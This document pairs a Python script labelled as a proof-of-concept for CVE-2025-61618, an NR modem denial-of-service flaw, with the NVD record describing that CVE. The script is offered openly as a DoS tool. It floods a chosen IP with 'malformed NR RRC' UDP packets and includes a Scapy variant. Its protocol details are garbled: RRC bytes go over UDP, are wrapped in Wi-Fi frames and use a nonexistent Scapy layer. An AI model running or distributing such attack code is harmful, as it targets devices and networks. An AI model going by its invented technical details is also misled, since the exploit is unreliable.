CVE-2025-61618

# CVE-2025-61618 PoC - NR Modem Input Validation Error # This PoC demonstrates sending malformed NR RRC messages to trigger DoS # Note: This is for educational and authorized testing purposes only import socket import struct from scapy.all import * def create_malformed_nr_rrc_message(): """ Create a malformed NR RRC Setup Request to trigger input validation error """ # NR RRC Connection Request message with malformed UE Identity rrc_pdu = bytes([ 0x00, 0x01, # RRC Transaction Identifier 0x00, 0x40, # RRC Message Type: Connection Request 0x00, 0x00, 0x00, 0x00, # Spare bits # Malformed UE Identity - trigger validation error 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, # Invalid length/format 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ]) return rrc_pdu def send_nr_dos_packets(target_ip, port=38412, count=100): """ Send malformed NR packets to trigger the vulnerability Args: target_ip: Target device IP address port: Target port (typically 38412 for NR NAS) count: Number of packets to send """ print(f"[*] Starting DoS attack simulation on {target_ip}:{port}") print(f"[*] Sending {count} malformed NR RRC messages...") malformed_msg = create_malformed_nr_rrc_message() for i in range(count): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(malformed_msg, (target_ip, port)) sock.close() if i % 10 == 0: print(f"[*] Sent {i} packets...") except Exception as e: print(f"[!] Error sending packet: {e}") print("[*] Attack simulation completed") print("[*] If vulnerable, the NR modem should crash/reset") def analyze_with_scapy(target_mac, ssid="TestNR"): """ Alternative method using Scapy for LTE/NR packet crafting """ print(f"[*] Crafting malformed NR RRC packet...") # Create base NR RRC packet pkt = RadioTap() /\n Dot15dTaskFrame() /\n Dot11() /\n Dot11QoS() /\n LLC() /\n SNAP() /\n Raw(load=create_malformed_nr_rrc_message()) send(pkt, iface="wlan0", count=1, verbose=1) print("[*] Malformed packet sent") if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description='CVE-2025-61618 PoC') parser.add_argument('target', help='Target IP address') parser.add_argument('--port', type=int, default=38412, help='Target port') parser.add_argument('--count', type=int, default=100, help='Number of packets') args = parser.parse_args() send_nr_dos_packets(args.target, args.port, args.count)

{"cve": {"id": "CVE-2025-61618", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.867", "lastModified": "2025-12-02T15:53:57.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, hay una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría llevar a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}